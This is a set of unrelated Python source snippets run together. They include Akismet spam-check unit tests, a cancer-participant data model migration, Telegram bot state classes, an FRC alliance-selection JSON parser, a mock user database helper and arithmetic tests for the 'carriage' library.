api_key=api_key or self.api_key,
domain=AKISMET_DOMAIN,
version=AKISMET_VERSION,
)
def _get_default_parameters(self):
return {
'user_ip': self.user_ip,
'referrer': 'unknown',
'user_agent': USER_AGENT,
'charset': Akismet.charset,
'is_test': str(self.is_test),
'blog': self.blog,
}
def test_check(self):
parameters = dict(self._get_default_parameters(), user_agent=USER_AGENT)
self.mock.post(self._get_url(AKISMET_CHECK_URL), json=False,
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.assertEqual(self.akismet.check(self.user_ip, USER_AGENT, blog=self.blog), SpamStatus.Ham)
def test_check_spam(self):
comment_author = 'viagra-<PASSWORD>'
parameters = dict(self._get_default_parameters(), user_agent=EVIL_USER_AGENT,
comment_author=comment_author)
self.mock.post(self._get_url(AKISMET_CHECK_URL), json=True,
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.assertEqual(self.akismet.check(self.user_ip, EVIL_USER_AGENT, comment_author=comment_author,
blog=self.blog), SpamStatus.ProbableSpam)
def test_invalid_api_key(self):
api_key = 'invalid_api_key'
self.mock.post(self._get_url(AKISMET_CHECK_URL, api_key=api_key), text='')
akismet = Akismet(api_key, is_test=True)
with self.assertRaises(AkismetServerError):
akismet.check(self.user_ip, EVIL_USER_AGENT, blog=self.blog)
def test_submit_spam(self):
parameters = dict(self._get_default_parameters(), user_agent=EVIL_USER_AGENT, is_spam='True')
self.mock.post(self._get_url(AKISMET_SUBMIT_SPAM_URL), text="Thanks for making the web a better place.",
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.akismet.submit_spam(self.user_ip, EVIL_USER_AGENT, blog=self.blog)
def test_submit_ham(self):
parameters = dict(self._get_default_parameters(), user_agent=USER_AGENT, is_spam='False')
self.mock.post(self._get_url(AKISMET_SUBMIT_HAM_URL), text="Thanks for making the web a better place.",
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.akismet.submit_ham(self.user_ip, USER_AGENT, blog=self.blog)
def test_datetime(self):
blog_url = 'http://127.0.0.1'
comment_date = datetime.datetime(2016, 4, 16, 15, 12, 5)
comment_post_modified = datetime.datetime(2016, 4, 16, 16, 27, 31)
data = self.akismet._get_parameters({'blog': blog_url, 'comment_post_modified': comment_post_modified,
'comment_date': comment_date})
for dtkey in ['comment_date', 'comment_post_modified']:
self.assertIn('{0}_gmt'.format(dtkey), data)
self.assertNotIn(dtkey, data)
self.assertEqual(data['{0}_gmt'.format(dtkey)], locals()[dtkey].isoformat())
def test_timeout(self):
self.mock.post(self._get_url(AKISMET_SUBMIT_HAM_URL), exc=ConnectTimeout)
with self.assertRaises(requests.ConnectionError):
self.akismet.submit_ham(self.user_ip, USER_AGENT, blog=self.blog)
def test_require_blog_param(self):
with self.assertRaises(MissingParameterError):
self.akismet._get_parameters({})
if __name__ == '__main__':
unittest.main()
|
1698403
|
from protocols import participant_1_0_0
from protocols import participant_1_0_3
from protocols.migration import BaseMigration
class MigrationParticipants103To100(BaseMigration):
old_model = participant_1_0_3
new_model = participant_1_0_0
def migrate_cancer_participant(self, cancer_participant):
migrated_participant = self.new_model.CancerParticipant.fromJsonDict(cancer_participant.toJsonDict())
migrated_participant.LDPCode = next((tumour_sample.LDPCode for tumour_sample in cancer_participant.tumourSamples), None)
migrated_participant.primaryDiagnosisDisease = None
if isinstance(cancer_participant.primaryDiagnosisDisease, list):
migrated_participant.primaryDiagnosisDisease = ','.join(cancer_participant.primaryDiagnosisDisease)
migrated_participant.primaryDiagnosisSubDisease = None
if isinstance(cancer_participant.primaryDiagnosisSubDisease, list):
migrated_participant.primaryDiagnosisSubDisease = ','.join(cancer_participant.primaryDiagnosisSubDisease)
migrated_participant.assignedICD10 = None
if isinstance(cancer_participant.assignedICD10, list):
migrated_participant.assignedICD10 = ','.join(cancer_participant.assignedICD10)
migrated_participant.tumourSamples = self.migrate_tumour_samples(
tumour_samples=cancer_participant.tumourSamples
)
migrated_participant.germlineSamples = self.migrate_germline_samples(
germline_samples=cancer_participant.germlineSamples
)
migrated_participant.matchedSamples = self.migrate_matched_samples(
matched_samples=cancer_participant.matchedSamples
)
return self.validate_object(
object_to_validate=migrated_participant, object_type=self.new_model.CancerParticipant
)
def migrate_matched_samples(self, matched_samples):
return [self.migrate_matched_sample(matched_sample=matched_sample) for matched_sample in matched_samples]
def migrate_matched_sample(self, matched_sample):
return self.new_model.MatchedSamples().fromJsonDict(matched_sample.toJsonDict())
def migrate_germline_samples(self, germline_samples):
return [self.migrate_germline_sample(germline_sample=germline_sample) for germline_sample in germline_samples]
def migrate_germline_sample(self, germline_sample):
return self.new_model.GermlineSample().fromJsonDict(germline_sample.toJsonDict())
def migrate_tumour_samples(self, tumour_samples):
return [self.migrate_tumour_sample(tumour_sample=tumour_sample) for tumour_sample in tumour_samples]
def migrate_tumour_sample(self, tumour_sample):
"""
The tumourId will be migrated when the value can be parsed to an integer, otherwise it will be replaced
by the labSampleId.
:param tumour_sample:
:return:
"""
migrated_tumour_sample = self.new_model.TumourSample().fromJsonDict(
jsonDict=tumour_sample.toJsonDict()
)
migrated_tumour_sample.tumourId = None
if tumour_sample.tumourId is not None:
try:
migrated_tumour_sample.tumourId = int(tumour_sample.tumourId)
except ValueError:
migrated_tumour_sample.tumourId = tumour_sample.labSampleId
migrated_tumour_sample.tumourType = tumour_sample.diseaseType
migrated_tumour_sample.tumourSubType = tumour_sample.diseaseSubType
migrated_tumour_sample.phase = tumour_sample.tumourType
return self.validate_object(
object_to_validate=migrated_tumour_sample, object_type=self.new_model.TumourSample
)
|
1698415
|
from aiogram.dispatcher.filters.state import State, StatesGroup
class ConfigFlow(StatesGroup):
waiting_for_api_key = State()
class SettingsFlow(StatesGroup):
waiting_for_setting_select = State()
waiting_for_new_key = State()
|
1698468
|
from typing import AnyStr, List
from pyre_extensions import safe_json
from backend.common.datafeed_parsers.exceptions import ParserInputException
from backend.common.models.alliance import EventAlliance
from backend.common.models.keys import TeamKey
from backend.common.models.team import Team
class JSONAllianceSelectionsParser:
@staticmethod
def parse(alliances_json: AnyStr) -> List[EventAlliance]:
"""
Parse JSON that contains team_keys
Format is as follows:
[[captain1, pick1-1, pick1-2(, ...)],
['frc254', 'frc971', 'frc604'],
...
[captain8, pick8-1, pick8-2(, ...)]]
"""
alliances = safe_json.loads(alliances_json, List[List[TeamKey]])
alliance_selections: List[EventAlliance] = []
for alliance in alliances:
is_empty = True
selection: EventAlliance = {"picks": [], "declines": []}
for team_key in alliance:
if not Team.validate_key_name(team_key):
raise ParserInputException(
"Bad team_key: '{}'. Must follow format: 'frcXXX'".format(
team_key
)
)
else:
selection["picks"].append(team_key)
is_empty = False
if not is_empty:
alliance_selections.append(selection)
return alliance_selections
|
1698507
|
MOCK_USERS = [{"email": "<EMAIL>", "salt": "8Fb23mMNHD5Zb8pr2qWA3PE9bH0=", "hashed":
"1736f83698df3f8153c1fbd6ce2840f8aace4f200771a46672635374073cc876cf0aa6a31f780e576578f791b5555b50df46303f0c3a7f2d21f91aa1429ac22e"}]
class MockDBHelper:
def get_user(self, email):
user = [x for x in MOCK_USERS if x.get("email") == email]
if user:
return user[0]
return None
def add_user(self, email, salt, hashed):
MOCK_USERS.append({"email": email, "salt": salt, "hashed": hashed})
|
1698585
|
from carriage import Row, X
def test_basic():
assert X.y(Row(x=2, y=3)) == 3
assert X['x'](dict(x=4, y=5)) == 4
assert (X + 3)(5) == 8
assert (X - 2)(6) == 4
assert (X * 3)(4) == 12
assert (X / 2)(9) == 4.5
assert (X // 2)(9) == 4
assert (X % 3)(5) == 2
assert (divmod(X, 3))(5) == (1, 2)
assert (X**2)(4) == 16
assert (X == 3)(3) == True
assert (3 == X)(4) == False
assert (X == 3)(4) == False
assert (3 == X)(3) == True
assert (X != 3)(4) == True
assert (3 != X)(3) == False
assert (X > 3)(4) == True
assert (X > 3)(2) == False
assert (3 > X)(4) == False
assert (3 > X)(2) == True
assert (X < 3)(4) == False
assert (X < 3)(2) == True
assert (X >= 3)(3) == True
assert (X >= 3)(2) == False
assert (X <= 3)(3) == True
assert (X <= 3)(2) == True
def test_reflected():
# assert X.y(Row(x=2, y=3)) == 3
# assert X['x'](dict(x=4, y=5)) == 4
assert (3 + X)(5) == 8
assert (2 - X)(6) == -4
assert (3 * X)(4) == 12
assert (9 / X)(2) == 4.5
assert (9 // X)(2) == 4
assert (5 % X)(3) == 2
assert (divmod(5, X))(3) == (1, 2)
assert (2**X)(3) == 8
def test_multiple_X():
assert (X.y + X.x)(Row(x=2, y=3)) == 5
assert (X['x'] + X['y'])(dict(x=2, y=3)) == 5
assert (X + X)(5) == 10
assert (X - X)(5) == 0
assert (X * X)(5) == 25
assert (X / X)(5) == 1
assert (X.y / X.x)(Row(x=2, y=3)) == 1.5
assert (X.y // X.x)(Row(x=2, y=3)) == 1
assert (X.y % X.x)(Row(x=3, y=5)) == 2
assert (divmod(X.y, X.x))(Row(x=3, y=5)) == (1, 2)
assert (X**X)(3) == 27
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.